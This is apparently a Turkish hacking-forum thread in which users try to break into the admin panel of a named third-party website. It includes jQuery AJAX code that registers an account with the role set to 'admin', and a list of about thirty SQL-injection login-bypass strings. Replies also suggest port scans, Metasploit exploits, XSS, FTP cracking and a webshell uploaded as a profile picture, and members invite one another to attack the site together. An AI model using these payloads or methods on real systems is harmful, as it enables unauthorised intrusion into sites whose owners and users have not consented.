Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
cevapladığınız için teşekkür ederim. Login bypass nasıl yaparım ? sql injection yok inputtan alınan veriyi ajax ile kontrol ediyordur büyük ihtimalle ama hinede deniyeyim. birde panel scripti olduğu için fazla sorgu yapmadan patlatmaya çalışıyorum. ben registera role sokmayı denedimde yemediMerhabalar ilk dikkatimi çeken şey admin panel sayfasının gözükmesi oldu. Login bypass denenebilir. Ayrıca sql açığı var mı diye de kontrol edebilirsiniz.
$(document).ready(function () {
alert(1)
var username = "dayi31"; // Kullanıcı adı
var email = "[email protected]"; // Kullanıcı e-posta adresi
var password = "dayi31"; // Kullanıcı şifresi
var turnstile = "ben sildim"; // Turnstile doğrulama token
var role = "admin"
// AJAX isteği
$.ajax({
url: 'https://siteadi.com/server/authorization', // Tam URL
type: 'POST',
dataType: 'json',
data: {
username: username,
email: email,
password: password,
turnstile: turnstile,
action: action,
role: role
},
success: function (response) {
if (response.status == 'success') {
alert(response.message, 'Başarılı');
setTimeout(() => window.location.href = 'home', 2000);
} else {
alert(response.message, 'Hata');
}
},
error: function () {
alert('İstek gönderilirken bir hata oluştu, lütfen sayfayı yenileyip tekrar deneyin.', 'Hata');
}
});
});
siz dosyaları listeliyorsunuz ama tam olarak giremediniz sanıyorum dosya cekemiyorsunuz sanırım portlardan hangisinede acık var ona bakın sonra msfconsole ile search ile taratın ve önce exploit kullanın bence zaten siyah ekranda linux komutlarını yurutuyorsanız hacklediniz demektir![]()
bu bir zafiyetmi sizce ?
Hocam register olunuyor zaten onda problem yok işte role denedim yemedi sorgu kısmında injection demek lazım orda bulursam db ye erişirimLogin bypass için bunları deneyebilirsin.
- ” or 1=1 or “”=”
- ” OR ”=”
- hey’ or 1=1–
- ‘ or 1=1–
- ” or 1=1–
- ‘ or ‘a’=’a
- ‘) or (‘a’=’a
- ‘hi’ or ‘x’=’x’;
- ‘or select *
- “)) or ((“x”))=((“x
- admin”or 1=1 or “”=”
- admin’–
- \x27\x6F\x72 SELECT *
- \x27\x4F\x52 SELECT *
- x’ or 1=1 or ‘x’=’y
- hi”) or (“a”=”a
- ” or “a”=”a
- or 1=1–
- or 1=1–
- ”Or 1 = 1′
- ‘OR”=’
- ‘ OR ”=’
- ‘ or 1=1 or ”=’
- anything’ OR ‘x’=’x
- ”Or’=’Or”
- 1’or’1’=’1
- admin”) or (“1″=”1”–
- ” or “”+”
- 'or'='or'
Genelde SQL açığı çok bulunmuyor bunlarda kapatıyorlar ama şansını denemek istersen Acunetix gibi programlara bak.Hocam register olunuyor zaten onda problem yok işte role denedim yemedi sorgu kısmında injection demek lazım orda bulursam db ye erişirim
Client dan dosyaları açtığım için php görünmüyor görünse zaten patlatmam 10sn exploit denemeliyim doğru diyorsunuzsiz dosyaları listeliyorsunuz ama tam olarak giremediniz sanıyorum dosya cekemiyorsunuz sanırım portlardan hangisinede acık var ona bakın sonra msfconsole ile search ile taratın ve önce exploit kullanın bence
Hocam scripti nasıl çalıyorlar peki ftp yi patlatarak fln mıGenelde SQL açığı çok bulunmuyor bunlarda kapatıyorlar ama şansını denemek istersen Acunetix gibi programlara bak.
Keşke olsaxss da deniyebilirsin
ftp den girsen zaten sitenin tamamı senin istedigini yap ama seninki daha cok sql acıgı gibi duruyor injection gerektirebilir bence yani olma ihtimali var büyük oranda diye düşünüyorumHocam scripti nasıl çalıyorlar peki ftp yi patlatarak fln mı
sunucuda php çalışıyor hocam cloudflare olduğu için port açıkları bulamadım nmap de sql injection da yok xss de yok profil resminde webshell ekliyeyim dedim o da yemedi cimere mi salsam acabaSunucuda .php dosyaları görüyor ise ya mevcut sunucu file manager olarak kullanılıyor yada sunucu da php çalışmıyordur.
Hacklemek için daha spesifik yöntemler bulunabilir bence.
bu tarz paneller tek bir altyapıdan türetilmiş şeyler attığın backend kodlarının bazılarını işine yarayacaksa sağlayabilirim incelemen içinsunucuda php çalışıyor hocam cloudflare olduğu için port açıkları bulamadım nmap de sql injection da yok xss de yok profil resminde webshell ekliyeyim dedim o da yemedi cimere mi salsam acaba
Ya patlatsam daha iyi olurdu.. ama işime yaramak değilde incelemek isterim e tabi temelinde db query ler yatıyorda lamerlar nasıl yazmış merak ettim atmak isterseniz yok demem valla. Birde site ismi ezik.fun belki biri patlatır patlatırsa haber verirse sevinirimbu tarz paneller tek bir altyapıdan türetilmiş şeyler attığın backend kodlarının bazılarını işine yarayacaksa sağlayabilirim incelemen için
siteyi atar mısınız incelemek isterim de![]()
bu bir zafiyetmi sizce ?
ezik.fun isterseniz beraber inceliyelim bana discorddan yazarsanız dc:sungercodesiteyi atar mısınız incelemek isterim de
Ben niye giremiyorum siteyeezik.fun isterseniz beraber inceliyelim bana discorddan yazarsanız dc:sungercode